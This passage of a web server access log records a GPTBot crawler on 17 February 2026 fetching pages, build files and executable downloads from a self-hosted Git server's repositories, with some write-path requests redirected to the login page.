(KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&state=all&type=all" +[17/Feb/2026:18:22:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d?display=rendered" [Client 74.7.227.38] [Length 11089] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" +[17/Feb/2026:18:22:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d?display=rendered" [Client 74.7.227.38] [Length 11089] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" +[17/Feb/2026:18:22:57 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/PostgresPatrol/dist" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/dist" +[17/Feb/2026:18:22:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/PostgresPatrol/dist" +[17/Feb/2026:18:22:57 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_upload/main/PostgresPatrol/dist" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/dist" +[17/Feb/2026:18:22:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_upload/main/PostgresPatrol/dist" +[17/Feb/2026:18:22:58 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/PostgresPatrol/dist" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/dist" +[17/Feb/2026:18:22:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/PostgresPatrol/dist" +[17/Feb/2026:18:22:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/PostgresPatrol/dist" [Client 74.7.227.38] [Length 9831] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/dist" +[17/Feb/2026:18:22:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresPatrol/dist/PostgresPatrol.exe" [Client 74.7.227.38] [Length 11074] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/dist" +[17/Feb/2026:18:23:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresPatrol/dist/PostgresPatrol-Debug.exe" [Client 74.7.227.38] [Length 11088] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/dist" +[17/Feb/2026:18:23:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d?display=rendered" [Client 74.7.227.38] [Length 11089] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o.d" +[17/Feb/2026:18:23:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&labels=0&milestone=-1&project=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10024] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&labels=0&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:18:23:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/src-old/old_controller.hpp?display=rendered" [Client 74.7.227.38] [Length 11064] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/src-old/old_controller.hpp" +[17/Feb/2026:18:23:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/src-old/old_controller.cpp?display=rendered" [Client 74.7.227.38] [Length 11064] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/src-old/old_controller.cpp" +[17/Feb/2026:18:23:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commit/3181052619700dceeeef81a9a0851130498f177e?files=.Notebook%2f%ec%84%a4%ec%b9%98%ed%8c%a8%ed%82%a4%ec%a7%80%20%ec%b2%b4%ed%81%ac%20by%20claude.md" [Client 74.7.227.38] [Length 27663] [Gzip 6.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/commits/commit/3181052619700dceeeef81a9a0851130498f177e/.Notebook/%EC%84%A4%EC%B9%98%ED%8C%A8%ED%82%A4%EC%A7%80%20%EC%B2%B4%ED%81%AC%20by%20claude.md" +[17/Feb/2026:18:23:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&state=closed&type=all" [Client 74.7.227.38] [Length 10185] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?state=closed&type=all" +[17/Feb/2026:18:23:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&labels=0&milestone=-1&project=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10031] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=1&labels=0&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:18:23:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&labels=0&milestone=-1&project=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10039] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&labels=0&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:18:23:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&labels=0&milestone=-1&project=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10208] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=1&labels=0&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:18:23:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/PostgresPatrol/dist/PostgresPatrol.exe" [Client 74.7.227.38] [Length 9842] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/dist/PostgresPatrol.exe" +[17/Feb/2026:18:23:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/PostgresPatrol/dist/PostgresPatrol-Debug.exe" [Client 74.7.227.38] [Length 9849] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/dist/PostgresPatrol-Debug.exe" +[17/Feb/2026:18:23:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/PostgresPatrol/dist/PostgresPatrol.exe" [Client 74.7.227.38] [Length 1009] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/dist/PostgresPatrol.exe" +[17/Feb/2026:18:23:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/PostgresPatrol/dist/PostgresPatrol.exe" [Client 74.7.227.38] [Length 10958571] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/dist/PostgresPatrol.exe" +[17/Feb/2026:18:23:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/PostgresPatrol/dist/PostgresPatrol-Debug.exe" [Client 74.7.227.38] [Length 10962886] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/dist/PostgresPatrol-Debug.exe" +[17/Feb/2026:18:23:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/PostgresPatrol/dist/PostgresPatrol-Debug.exe" [Client 74.7.227.38] [Length 1021] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/dist/PostgresPatrol-Debug.exe" +[17/Feb/2026:18:23:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&labels=0&milestone=-1&project=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 9997] [Gzip 3.58] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&labels=0&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:18:23:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&labels=0&milestone=-1&project=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10213] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=1&labels=0&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:18:23:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&labels=0&milestone=-1&project=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10024] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&labels=0&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:18:23:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&labels=0&milestone=-1&project=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 10203] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=1&labels=0&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:18:23:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&labels=0&milestone=-1&project=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10037] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=1&labels=0&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:18:23:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 9967] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&state=all&type=all" +[17/Feb/2026:18:23:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&state=closed&type=all" [Client 74.7.227.38] [Length 10007] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28any%29&state=all&type=all" +[17/Feb/2026:18:23:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&state=closed&type=all" [Client 74.7.227.38] [Length 10007] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28none%29&state=all&type=all" +[17/Feb/2026:18:23:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.ts?display=source" [Client 74.7.227.38] [Length 11384] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.ts" +[17/Feb/2026:18:23:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/cmake_clean.cmake?display=source" [Client 74.7.227.38] [Length 11748] [Gzip 3.30] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/cmake_clean.cmake" +[17/Feb/2026:18:23:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.ts?display=source" [Client 74.7.227.38] [Length 11385] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.ts" +[17/Feb/2026:18:23:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.d?display=rendered" [Client 74.7.227.38] [Length 11155] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.d" +[17/Feb/2026:18:23:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.d?display=rendered" [Client 74.7.227.38] [Length 11155] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.d" +[17/Feb/2026:18:23:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/cmake_clean.cmake?display=source" [Client 74.7.227.38] [Length 11749] [Gzip 3.30] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/cmake_clean.cmake" +[17/Feb/2026:18:23:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.txt?display=source" [Client 74.7.227.38] [Length 11318] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.txt" +[17/Feb/2026:18:23:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/build.make?display=source" [Client 74.7.227.38] [Length 16073] [Gzip 5.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/build.make" +[17/Feb/2026:18:23:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.txt?display=rendered" [Client 74.7.227.38] [Length 11152] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.txt" +[17/Feb/2026:18:23:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/flags.make?display=source" [Client 74.7.227.38] [Length 11671] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/flags.make" +[17/Feb/2026:18:23:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.txt?display=rendered" [Client 74.7.227.38] [Length 11150] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.txt" +[17/Feb/2026:18:23:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/cmake_clean.cmake?display=source" [Client 74.7.227.38] [Length 11751] [Gzip 3.30] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/cmake_clean.cmake" +[17/Feb/2026:18:23:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/build.make?display=source" [Client 74.7.227.38] [Length 16075] [Gzip 5.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/build.make" +[17/Feb/2026:18:23:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/flags.make?display=source" [Client 74.7.227.38] [Length 11673] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/flags.make" +[17/Feb/2026:18:23:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/cmake_clean.cmake?display=source" [Client 74.7.227.38] [Length 11750] [Gzip 3.30] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/cmake_clean.cmake" +[17/Feb/2026:18:23:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.txt?display=source" [Client 74.7.227.38] [Length 11320] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.txt" +[17/Feb/2026:18:23:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/build.make?display=source" [Client 74.7.227.38] [Length 16080] [Gzip 5.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/build.make" +[17/Feb/2026:18:23:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/flags.make?display=source" [Client 74.7.227.38] [Length 11669] [Gzip 3.18] [Sent-to 192.168.0.250] "Mozilla/5.0 